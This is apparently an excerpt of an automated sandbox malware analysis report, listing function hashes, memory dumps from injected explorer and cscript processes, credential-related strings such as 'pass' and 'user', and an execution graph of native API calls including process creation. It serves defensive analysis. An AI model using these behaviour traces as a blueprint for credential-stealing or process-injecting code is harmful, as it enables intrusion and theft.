                                                                            • Instruction Fuzzy Hash: C621C330620B4D8ECB05FFA8C8447EE7BA1FF68304F40421AE45AD7281DE788605CB89
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27CE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .$l$l$t
                                                                            • API String ID: 0-168566397
                                                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                            • Instruction ID: e036d8f82c12c7d2c6dcb286806ea8c24bfed6994e833310f529c9a94542597d
                                                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                            • Instruction Fuzzy Hash: 80217A74A24B0D9BDB08FFA8C4447E9BBF0FB18304F90462ED009E3A81DB789552CB84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27CE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .$l$l$t
                                                                            • API String ID: 0-168566397
                                                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                            • Instruction ID: 6ab08de5eccb9bc1328ef4792c7937888fe3c2307d01a9a082d14df560e9a5ed
                                                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                            • Instruction Fuzzy Hash: 07216B74A25B0D9BDB04FFA8C0447A9BBF0FB18304F50462ED009E3A91DB789552CB84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0F27CFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: auth$logi$pass$user
                                                                            • API String ID: 0-2393853802
                                                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                            • Instruction ID: d78321711f53dd796036dd5aee9238ca4ea14b1a1062728d28372807131c19b3
                                                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                            • Instruction Fuzzy Hash: C621D230624B0D8BCB05DF9D98807EEB7F1EF88344F40561AD40ADB286DBB4E9558BC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:1.7%
                                                                            Dynamic/Decrypted Code Coverage:2.2%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:594
                                                                            Total number of Limit Nodes:71
                                                                            execution_graph 99612 4f42ad0 LdrInitializeThunk 99614 2dbf13d 99617 2dbb9d0 99614->99617 99618 2dbb9f6 99617->99618 99625 2da9d40 99618->99625 99620 2dbba02 99621 2dbba26 99620->99621 99633 2da8f30 99620->99633 99671 2dba6b0 99621->99671 99674 2da9c90 99625->99674 99627 2da9d4d 99628 2da9d54 99627->99628 99686 2da9c30 99627->99686 99628->99620 99634 2da8f57 99633->99634 100104 2dab1c0 99634->100104 99636 2da8f69 100108 2daaf10 99636->100108 99638 2da8f86 99640 2da8f8d 99638->99640 100179 2daae40 LdrLoadDll 99638->100179 99668 2da90f2 99640->99668 100112 2daf380 99640->100112 99642 2da8ffc 100124 2daf410 99642->100124 99644 2da9006 99645 2dbbf90 2 API calls 99644->99645 99644->99668 99646 2da902a 99645->99646 99647 2dbbf90 2 API calls 99646->99647 99648 2da903b 99647->99648 99649 2dbbf90 2 API calls 99648->99649 99650 2da904c 99649->99650 100136 2daca90 99650->100136 99652 2da9059 99653 2db4a50 8 API calls 99652->99653 99654 2da9066 99653->99654 99655 2db4a50 8 API calls 99654->99655 99656 2da9077 99655->99656 99657 2da9084 99656->99657 99658 2da90a5 99656->99658 100146 2dad620 99657->100146 99659 2db4a50 8 API calls 99658->99659 99667 2da90c1 99659->99667 99663 2da90e9 99665 2da8d00 23 API calls 99663->99665 99664 2da9092 100162 2da8d00 99664->100162 99665->99668 99667->99663 100180 2dad6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99667->100180 99668->99621 99672 2dbaf60 LdrLoadDll 99671->99672 99673 2dba6cf 99672->99673 99706 2db8bc0 99674->99706 99678 2da9cb6 99678->99627 99679 2da9cac 99679->99678 99713 2dbb2b0 99679->99713 99681 2da9cf3 99681->99678 99724 2da9ab0 99681->99724 99683 2da9d13 99730 2da9620 LdrLoadDll 99683->99730 99685 2da9d25 99685->99627 99687 2da9c40 99686->99687 100079 2dbb5a0 99687->100079 99690 2dbb5a0 LdrLoadDll 99691 2da9c5b 99690->99691 99692 2dbb5a0 LdrLoadDll 99691->99692 99693 2da9c71 99692->99693 99694 2daf180 99693->99694 99695 2daf199 99694->99695 100087 2dab040 99695->100087 99697 2daf1ac 100091 2dba1e0 99697->100091 99700 2da9d65 99700->99620 99702 2daf1d2 99703 2daf1fd 99702->99703 100097 2dba260 99702->100097 99705 2dba490 2 API calls 99703->99705 99705->99700 99707 2db8bcf 99706->99707 99731 2db4e50 99707->99731 99709 2da9ca3 99710 2db8a70 99709->99710 99737 2dba600 99710->99737 99714 2dbb2c9 99713->99714 99744 2db4a50 99714->99744 99716 2dbb2e1 99717 2dbb2ea 99716->99717 99783 2dbb0f0 99716->99783 99717->99681 99719 2dbb2fe 99719->99717 99801 2db9f00 99719->99801 100057 2da7ea0 99724->100057 99726 2da9ad1 99726->99683 99727 2da9aca 99727->99726 100070 2da8160 99727->100070 99730->99685 99732 2db4e5e 99731->99732 99733 2db4e6a 99731->99733 99732->99733 99736 2db52d0 LdrLoadDll 99732->99736 99733->99709 99735 2db4fbc 99735->99709 99736->99735 99740 2dbaf60 99737->99740 99739 2db8a85 99739->99679 99741 2dbaf70 99740->99741 99743 2dbaf92 99740->99743 99742 2db4e50 LdrLoadDll 99741->99742 99742->99743 99743->99739 99745 2db4d85 99744->99745 99755 2db4a64 99744->99755 99745->99716 99748 2db4b73 99869 2dba460 LdrLoadDll 99748->99869 99749 2db4b90 99812 2dba360 99749->99812 99752 2db4b7d 99752->99716 99753 2db4bb7 99754 2dbbdc0 2 API calls 99753->99754 99758 2db4bc3 99754->99758 99755->99745 99809 2db9c50 99755->99809 99756 2db4d49 99757 2dba490 2 API calls 99756->99757 99760 2db4d50 99757->99760 99758->99752 99758->99756 99759 2db4d5f 99758->99759 99763 2db4c52 99758->99763 99878 2db4790 LdrLoadDll NtReadFile NtClose 99759->99878 99760->99716 99762 2db4d72 99762->99716 99764 2db4cb9 99763->99764 99766 2db4c61 99763->99766 99764->99756 99765 2db4ccc 99764->99765 99871 2dba2e0 99765->99871 99768 2db4c7a 99766->99768 99769 2db4c66 99766->99769 99770 2db4c7f 99768->99770 99771 2db4c97 99768->99771 99870 2db4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99769->99870 99815 2db46f0 99770->99815 99771->99760 99827 2db4410 99771->99827 99776 2db4c70 99776->99716 99777 2db4c8d 99777->99716 99779 2db4d2c 99875 2dba490 99779->99875 99780 2db4caf 99780->99716 99782 2db4d38 99782->99716 99784 2dbb101 99783->99784 99785 2dbb113 99784->99785 99896 2dbbd40 99784->99896 99785->99719 99787 2dbb134 99899 2db4070 99787->99899 99789 2dbb180 99789->99719 99790 2dbb157 99790->99789 99791 2db4070 3 API calls 99790->99791 99793 2dbb179 99791->99793 99793->99789 99931 2db5390 99793->99931 99794 2dbb20a 99795 2dbb21a 99794->99795 100025 2dbaf00 LdrLoadDll 99794->100025 99941 2dbad70 99795->99941 99798 2dbb248 100020 2db9ec0 99798->100020 99802 2db9f1c 99801->99802 99803 2dbaf60 LdrLoadDll 99801->99803 100051 4f42c0a 99802->100051 99803->99802 99804 2db9f37 99806 2dbbdc0 99804->99806 100054 2dba670 99806->100054 99808 2dbb359 99808->99681 99810 2dbaf60 LdrLoadDll 99809->99810 99811 2db4b44 99810->99811 99811->99748 99811->99749 99811->99752 99813 2dba37c NtCreateFile 99812->99813 99814 2dbaf60 LdrLoadDll 99812->99814 99813->99753 99814->99813 99816 2db470c 99815->99816 99817 2dba2e0 LdrLoadDll 99816->99817 99818 2db472d 99817->99818 99819 2db4748 99818->99819 99820 2db4734 99818->99820 99822 2dba490 2 API calls 99819->99822 99821 2dba490 2 API calls 99820->99821 99823 2db473d 99821->99823 99824 2db4751 99822->99824 99823->99777 99879 2dbbfd0 LdrLoadDll RtlAllocateHeap 99824->99879 99826 2db475c 99826->99777 99828 2db445b 99827->99828 99829 2db448e 99827->99829 99830 2dba2e0 LdrLoadDll 99828->99830 99831 2db45d9 99829->99831 99835 2db44aa 99829->99835 99832 2db4476 99830->99832 99833 2dba2e0 LdrLoadDll 99831->99833 99834 2dba490 2 API calls 99832->99834 99839 2db45f4 99833->99839 99836 2db447f 99834->99836 99837 2dba2e0 LdrLoadDll 99835->99837 99836->99780 99838 2db44c5 99837->99838 99841 2db44cc 99838->99841 99842 2db44e1 99838->99842 99892 2dba320 LdrLoadDll 99839->99892 99845 2dba490 2 API calls 99841->99845 99843 2db44e6 99842->99843 99847 2db44fc 99842->99847 99846 2dba490 2 API calls 99843->99846 99844 2db462e 99848 2dba490 2 API calls 99844->99848 99849 2db44d5 99845->99849 99850 2db44ef 99846->99850 99854 2db4501 99847->99854 99880 2dbbf90 99847->99880 99851 2db4639 99848->99851 99849->99780 99850->99780 99851->99780 99862 2db4513 99854->99862 99883 2dba410 99854->99883 99855 2db4567 99856 2db457e 99855->99856 99891 2dba2a0 LdrLoadDll 99855->99891 99858 2db459a 99856->99858 99859 2db4585 99856->99859 99861 2dba490 2 API calls 99858->99861 99860 2dba490 2 API calls 99859->99860 99860->99862 99863 2db45a3 99861->99863 99862->99780 99864 2db45cf 99863->99864 99886 2dbbb90 99863->99886 99864->99780 99866 2db45ba 99867 2dbbdc0 2 API calls 99866->99867 99868 2db45c3 99867->99868 99868->99780 99869->99752 99870->99776 99872 2dbaf60 LdrLoadDll 99871->99872 99873 2db4d14 99872->99873 99874 2dba320 LdrLoadDll 99873->99874 99874->99779 99876 2dbaf60 LdrLoadDll 99875->99876 99877 2dba4ac NtClose 99876->99877 99877->99782 99878->99762 99879->99826 99893 2dba630 99880->99893 99882 2dbbfa8 99882->99854 99884 2dbaf60 LdrLoadDll 99883->99884 99885 2dba42c NtReadFile 99884->99885 99885->99855 99887 2dbbb9d 99886->99887 99888 2dbbbb4 99886->99888 99887->99888 99889 2dbbf90 2 API calls 99887->99889 99888->99866 99890 2dbbbcb 99889->99890 99890->99866 99891->99856 99892->99844 99894 2dbaf60 LdrLoadDll 99893->99894 99895 2dba64c RtlAllocateHeap 99894->99895 99895->99882 100026 2dba540 99896->100026 99898 2dbbd6d 99898->99787 99900 2db4081 99899->99900 99901 2db4089 99899->99901 99900->99790 99930 2db435c 99901->99930 100029 2dbcf30 99901->100029 99903 2db40dd 99904 2dbcf30 2 API calls 99903->99904 99907 2db40e8 99904->99907 99905 2db4136 99908 2dbcf30 2 API calls 99905->99908 99907->99905 100037 2dbcfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 99907->100037 100038 2dbd060 99907->100038 99910 2db414a 99908->99910 99911 2db41a7 99910->99911 99914 2dbd060 3 API calls 99910->99914 99912 2dbcf30 2 API calls 99911->99912 99913 2db41bd 99912->99913 99915 2db41fa 99913->99915 99917 2dbd060 3 API calls 99913->99917 99914->99910 99916 2dbcf30 2 API calls 99915->99916 99918 2db4205 99916->99918 99917->99913 99919 2dbd060 3 API calls 99918->99919 99926 2db423f 99918->99926 99919->99918 99922 2dbcf90 2 API calls 99923 2db433e 99922->99923 99924 2dbcf90 2 API calls 99923->99924 99925 2db4348 99924->99925 99927 2dbcf90 2 API calls 99925->99927 100034 2dbcf90 99926->100034 99928 2db4352 99927->99928 99929 2dbcf90 2 API calls 99928->99929 99929->99930 99930->99790 99932 2db53a1 99931->99932 99933 2db4a50 8 API calls 99932->99933 99935 2db53b7 99933->99935 99934 2db540a 99934->99794 99935->99934 99936 2db53f2 99935->99936 99937 2db5405 99935->99937 99938 2dbbdc0 2 API calls 99936->99938 99939 2dbbdc0 2 API calls 99937->99939 99940 2db53f7 99938->99940 99939->99934 99940->99794 100044 2dbac30 99941->100044 99944 2dbac30 LdrLoadDll 99945 2dbad8d 99944->99945 99946 2dbac30 LdrLoadDll 99945->99946 99947 2dbad96 99946->99947 99948 2dbac30 LdrLoadDll 99947->99948 99949 2dbad9f 99948->99949 99950 2dbac30 LdrLoadDll 99949->99950 99951 2dbada8 99950->99951 99952 2dbac30 LdrLoadDll 99951->99952 99953 2dbadb1 99952->99953 99954 2dbac30 LdrLoadDll 99953->99954 99955 2dbadbd 99954->99955 99956 2dbac30 LdrLoadDll 99955->99956 99957 2dbadc6 99956->99957 99958 2dbac30 LdrLoadDll 99957->99958 99959 2dbadcf 99958->99959 99960 2dbac30 LdrLoadDll 99959->99960 99961 2dbadd8 99960->99961 99962 2dbac30 LdrLoadDll 99961->99962 99963 2dbade1 99962->99963 99964 2dbac30 LdrLoadDll 99963->99964 99965 2dbadea 99964->99965 99966 2dbac30 LdrLoadDll 99965->99966 99967 2dbadf6 99966->99967 99968 2dbac30 LdrLoadDll 99967->99968 99969 2dbadff 99968->99969 99970 2dbac30 LdrLoadDll 99969->99970 99971 2dbae08 99970->99971 99972 2dbac30 LdrLoadDll 99971->99972 99973 2dbae11 99972->99973 99974 2dbac30 LdrLoadDll 99973->99974 99975 2dbae1a 99974->99975 99976 2dbac30 LdrLoadDll 99975->99976 99977 2dbae23 99976->99977 99978 2dbac30 LdrLoadDll 99977->99978 99979 2dbae2f 99978->99979 99980 2dbac30 LdrLoadDll 99979->99980 99981 2dbae38 99980->99981 99982 2dbac30 LdrLoadDll 99981->99982 99983 2dbae41 99982->99983 99984 2dbac30 LdrLoadDll 99983->99984 99985 2dbae4a 99984->99985 99986 2dbac30 LdrLoadDll 99985->99986 99987 2dbae53 99986->99987 99988 2dbac30 LdrLoadDll 99987->99988 99989 2dbae5c 99988->99989 99990 2dbac30 LdrLoadDll 99989->99990 99991 2dbae68 99990->99991 99992 2dbac30 LdrLoadDll 99991->99992 99993 2dbae71 99992->99993 99994 2dbac30 LdrLoadDll 99993->99994 99995 2dbae7a 99994->99995 99996 2dbac30 LdrLoadDll 99995->99996 99997 2dbae83 99996->99997 99998 2dbac30 LdrLoadDll 99997->99998 99999 2dbae8c 99998->99999 100000 2dbac30 LdrLoadDll 99999->100000 100001 2dbae95 100000->100001 100002 2dbac30 LdrLoadDll 100001->100002 100003 2dbaea1 100002->100003 100004 2dbac30 LdrLoadDll 100003->100004 100005 2dbaeaa 100004->100005 100006 2dbac30 LdrLoadDll 100005->100006 100007 2dbaeb3 100006->100007 100008 2dbac30 LdrLoadDll 100007->100008 100009 2dbaebc 100008->100009 100010 2dbac30 LdrLoadDll 100009->100010 100011 2dbaec5 100010->100011 100012 2dbac30 LdrLoadDll 100011->100012 100013 2dbaece 100012->100013 100014 2dbac30 LdrLoadDll 100013->100014 100015 2dbaeda 100014->100015 100016 2dbac30 LdrLoadDll 100015->100016 100017 2dbaee3 100016->100017 100018 2dbac30 LdrLoadDll 100017->100018 100019 2dbaeec 100018->100019 100019->99798 100021 2dbaf60 LdrLoadDll 100020->100021 100022 2db9edc 100021->100022 100050 4f42df0 LdrInitializeThunk 100022->100050 100023 2db9ef3 100023->99719 100025->99795 100027 2dbaf60 LdrLoadDll 100026->100027 100028 2dba55c NtAllocateVirtualMemory 100027->100028 100028->99898 100030 2dbcf40 100029->100030 100031 2dbcf46 100029->100031 100030->99903 100032 2dbbf90 2 API calls 100031->100032 100033 2dbcf6c 100032->100033 100033->99903 100035 2dbbdc0 2 API calls 100034->100035 100036 2db4334 100035->100036 100036->99922 100037->99907 100039 2dbcfd0 100038->100039 100040 2dbd02d 100039->100040 100041 2dbbf90 2 API calls 100039->100041 100040->99907 100042 2dbd00a 100041->100042 100043 2dbbdc0 2 API calls 100042->100043 100043->100040 100045 2dbac4b 100044->100045 100046 2db4e50 LdrLoadDll 100045->100046 100047 2dbac6b 100046->100047 100048 2db4e50 LdrLoadDll 100047->100048 100049 2dbad17 100047->100049 100048->100049 100049->99944 100050->100023 100052 4f42c11 100051->100052 100053 4f42c1f LdrInitializeThunk 100051->100053 100052->99804 100053->99804 100055 2dbaf60 LdrLoadDll 100054->100055 100056 2dba68c RtlFreeHeap 100055->100056 100056->99808 100058 2da7eab 100057->100058 100059 2da7eb0 100057->100059 100058->99727 100060 2dbbd40 2 API calls 100059->100060 100061 2da7ed5 100060->100061 100062 2da7f38 100061->100062 100063 2db9ec0 2 API calls 100061->100063 100064 2da7f3e 100061->100064 100069 2dbbd40 2 API calls 100061->100069 100073 2dba5c0 100061->100073 100062->99727 100063->100061 100066 2da7f64 100064->100066 100067 2dba5c0 2 API calls 100064->100067 100066->99727 100068 2da7f55 100067->100068 100068->99727 100069->100061 100071 2da817e 100070->100071 100072 2dba5c0 2 API calls 100070->100072 100071->99683 100072->100071 100074 2dbaf60 LdrLoadDll 100073->100074 100075 2dba5dc 100074->100075 100078 4f42c70 LdrInitializeThunk 100075->100078 100076 2dba5f3 100076->100061 100078->100076 100080 2dbb5c3 100079->100080 100083 2daacf0 100080->100083 100084 2daad14 100083->100084 100085 2da9c4a 100084->100085 100086 2daad50 LdrLoadDll 100084->100086 100085->99690 100086->100085 100088 2dab063 100087->100088 100090 2dab0e0 100088->100090 100102 2db9c90 LdrLoadDll 100088->100102 100090->99697 100092 2dbaf60 LdrLoadDll 100091->100092 100093 2daf1bb 100092->100093 100093->99700 100094 2dba7d0 100093->100094 100095 2dbaf60 LdrLoadDll 100094->100095 100096 2dba7ef LookupPrivilegeValueW 100095->100096 100096->99702 100098 2dba27c 100097->100098 100099 2dbaf60 LdrLoadDll 100097->100099 100103 4f42ea0 LdrInitializeThunk 100098->100103 100099->100098 100100 2dba29b 100100->99703 100102->100090 100103->100100 100105 2dab1f0 100104->100105 100106 2dab040 LdrLoadDll 100105->100106 100107 2dab204 100106->100107 100107->99636 100109 2daaf34 100108->100109 100181 2db9c90 LdrLoadDll 100109->100181 100111 2daaf6e 100111->99638 100113 2daf3ac 100112->100113 100114 2dab1c0 LdrLoadDll 100113->100114 100115 2daf3be 100114->100115 100182 2daf290 100115->100182 100118 2daf3d9 100119 2dba490 2 API calls 100118->100119 100121 2daf3e4 100118->100121 100119->100121 100120 2daf3f1 100122 2dba490 2 API calls 100120->100122 100123 2daf402 100120->100123 100121->99642 100122->100123 100123->99642 100125 2daf43c 100124->100125 100201 2dab2b0 100125->100201 100127 2daf44e 100128 2daf290 3 API calls 100127->100128 100129 2daf45f 100128->100129 100130 2daf469 100129->100130 100131 2daf481 100129->100131 100132 2dba490 2 API calls 100130->100132 100133 2daf474 100130->100133 100134 2dba490 2 API calls 100131->100134 100135 2daf492 100131->100135 100132->100133 100133->99644 100134->100135 100135->99644 100137 2dacaa6 100136->100137 100138 2dacab0 100136->100138 100137->99652 100139 2daaf10 LdrLoadDll 100138->100139 100140 2dacb4e 100139->100140 100141 2dacb74 100140->100141 100142 2dab040 LdrLoadDll 100140->100142 100141->99652 100143 2dacb90 100142->100143 100144 2db4a50 8 API calls 100143->100144 100145 2dacbe5 100144->100145 100145->99652 100147 2dad646 100146->100147 100148 2dab040 LdrLoadDll 100147->100148 100149 2dad65a 100148->100149 100205 2dad310 100149->100205 100151 2da908b 100152 2dacc00 100151->100152 100153 2dacc26 100152->100153 100154 2dab040 LdrLoadDll 100153->100154 100155 2dacca9 100153->100155 100154->100155 100156 2dab040 LdrLoadDll 100155->100156 100157 2dacd16 100156->100157 100158 2daaf10 LdrLoadDll 100157->100158 100159 2dacd7f 100158->100159 100160 2dab040 LdrLoadDll 100159->100160 100161 2dace2f 100160->100161 100161->99664 100165 2da8d14 100162->100165 100234 2daf6d0 100162->100234 100164 2da8f25 100164->99621 100165->100164 100239 2db43a0 100165->100239 100167 2da8d70 100167->100164 100242 2da8ab0 100167->100242 100170 2dbcf30 2 API calls 100171 2da8db2 100170->100171 100172 2dbd060 3 API calls 100171->100172 100176 2da8dc7 100172->100176 100173 2da7ea0 4 API calls 100173->100176 100176->100164 100176->100173 100177 2dac7b0 19 API calls 100176->100177 100178 2da8160 2 API calls 100176->100178 100247 2daf670 100176->100247 100251 2daf080 21 API calls 100176->100251 100177->100176 100178->100176 100179->99640 100180->99663 100181->100111 100183 2daf2aa 100182->100183 100184 2daf360 100182->100184 100185 2dab040 LdrLoadDll 100183->100185 100184->100118 100184->100120 100186 2daf2cc 100185->100186 100192 2db9f40 100186->100192 100188 2daf30e 100195 2db9f80 100188->100195 100191 2dba490 2 API calls 100191->100184 100193 2dbaf60 LdrLoadDll 100192->100193 100194 2db9f5c 100193->100194 100194->100188 100196 2dbaf60 LdrLoadDll 100195->100196 100197 2db9f9c 100196->100197 100200 4f435c0 LdrInitializeThunk 100197->100200 100198 2daf354 100198->100191 100200->100198 100202 2dab2d7 100201->100202 100203 2dab040 LdrLoadDll 100202->100203 100204 2dab313 100203->100204 100204->100127 100206 2dad327 100205->100206 100214 2daf710 100206->100214 100210 2dad39b 100211 2dad3a2 100210->100211 100225 2dba2a0 LdrLoadDll 100210->100225 100211->100151 100213 2dad3b5 100213->100151 100215 2daf735 100214->100215 100226 2da81a0 100215->100226 100217 2daf759 100218 2dad36f 100217->100218 100219 2db4a50 8 API calls 100217->100219 100221 2dbbdc0 2 API calls 100217->100221 100233 2daf550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 100217->100233 100222 2dba6e0 100218->100222 100219->100217 100221->100217 100223 2dbaf60 LdrLoadDll 100222->100223 100224 2dba6ff CreateProcessInternalW 100223->100224 100224->100210 100225->100213 100227 2da829f 100226->100227 100228 2da81b5 100226->100228 100227->100217 100228->100227 100229 2db4a50 8 API calls 100228->100229 100230 2da8222 100229->100230 100231 2dbbdc0 2 API calls 100230->100231 100232 2da8249 100230->100232 100231->100232 100232->100217 100233->100217 100235 2db4e50 LdrLoadDll 100234->100235 100236 2daf6ef 100235->100236 100237 2daf6fd 100236->100237 100238 2daf6f6 SetErrorMode 100236->100238 100237->100165 100238->100237 100252 2daf4a0 100239->100252 100241 2db43c6 100241->100167 100243 2dbbd40 2 API calls 100242->100243 100246 2da8ad5 100243->100246 100244 2da8cea 100244->100170 100246->100244 100271 2db9880 100246->100271 100248 2daf683 100247->100248 100322 2db9e90 100248->100322 100251->100176 100253 2daf4bd 100252->100253 100259 2db9fc0 100253->100259 100256 2daf505 100256->100241 100260 2dbaf60 LdrLoadDll 100259->100260 100261 2db9fdc 100260->100261 100269 4f42f30 LdrInitializeThunk 100261->100269 100262 2daf4fe 100262->100256 100264 2dba010 100262->100264 100265 2dbaf60 LdrLoadDll 100264->100265 100266 2dba02c 100265->100266 100270 4f42d10 LdrInitializeThunk 100266->100270 100267 2daf52e 100267->100241 100269->100262 100270->100267 100272 2dbbf90 2 API calls 100271->100272 100273 2db9897 100272->100273 100292 2da9310 100273->100292 100275 2db98b2 100276 2db98d9 100275->100276 100277 2db98f0 100275->100277 100278 2dbbdc0 2 API calls 100276->100278 100280 2dbbd40 2 API calls 100277->100280 100279 2db98e6 100278->100279 100279->100244 100281 2db992a 100280->100281 100282 2dbbd40 2 API calls 100281->100282 100283 2db9943 100282->100283 100289 2db9be4 100283->100289 100298 2dbbd80 LdrLoadDll 100283->100298 100285 2db9bc9 100286 2db9bd0 100285->100286 100285->100289 100287 2dbbdc0 2 API calls 100286->100287 100288 2db9bda 100287->100288 100288->100244 100290 2dbbdc0 2 API calls 100289->100290 100291 2db9c39 100290->100291 100291->100244 100293 2da9335 100292->100293 100294 2daacf0 LdrLoadDll 100293->100294 100295 2da9368 100294->100295 100297 2da938d 100295->100297 100299 2dacf20 100295->100299 100297->100275 100298->100285 100300 2dacf4c 100299->100300 100301 2dba1e0 LdrLoadDll 100300->100301 100303 2dacf65 100301->100303 100302 2dacf6c 100302->100297 100303->100302 100310 2dba220 100303->100310 100305 2dacf8f 100305->100302 100317 2dba810 100305->100317 100307 2dacfa7 100308 2dba490 2 API calls 100307->100308 100309 2dacfca 100308->100309 100309->100297 100311 2dba23c 100310->100311 100312 2dbaf60 LdrLoadDll 100310->100312 100320 4f42ca0 LdrInitializeThunk 100311->100320 100312->100311 100313 2dba257 100313->100305 100321 4f42ea0 LdrInitializeThunk 100313->100321 100314 2dba29b 100314->100305 100318 2dbaf60 LdrLoadDll 100317->100318 100319 2dba82f 100318->100319 100319->100307 100320->100313 100321->100314 100323 2dbaf60 LdrLoadDll 100322->100323 100324 2db9eac 100323->100324 100327 4f42dd0 LdrInitializeThunk 100324->100327 100325 2daf6ae 100325->100176 100327->100325 100328 2db9080 100329 2dbbd40 2 API calls 100328->100329 100331 2db90bb 100329->100331 100330 2db919c 100331->100330 100332 2daacf0 LdrLoadDll 100331->100332 100333 2db90f1 100332->100333 100334 2db4e50 LdrLoadDll 100333->100334 100336 2db910d 100334->100336 100335 2db9120 Sleep 100335->100336 100336->100330 100336->100335 100339 2db8ca0 LdrLoadDll 100336->100339 100340 2db8eb0 LdrLoadDll 100336->100340 100339->100336 100340->100336

                                                                            Executed Functions

                                                                            Function 02DBA360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 283 2dba360-2dba376 284 2dba37c-2dba3b1 NtCreateFile 283->284 285 2dba377 call 2dbaf60 283->285 285->284
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02DB4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DB4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DBA3AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction ID: d4c3ba9ab10a5344ba0ee37dfeaa478d9d51a5202811c3753324c1335af96f4d
                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction Fuzzy Hash: A3F0BDB2200208ABCB08CF88DC94EEB77ADEF8C754F158248BA0D97240C630E811CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA35C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 286 2dba35c-2dba3b1 call 2dbaf60 NtCreateFile
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02DB4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DB4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DBA3AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: 0f551066871a270168d0ff2483714f43a096202a8d74b98515230281910a7744
                                                                            • Instruction ID: 2c98f333340c062494bfefbd94bbf21046d7a052ab077987f16bb6710d1b7778
                                                                            • Opcode Fuzzy Hash: 0f551066871a270168d0ff2483714f43a096202a8d74b98515230281910a7744
                                                                            • Instruction Fuzzy Hash: D4F014B2214148ABCB08DF98D884CEB77A9FF8C354B14864DFA0D93205D630E851CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA53A Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
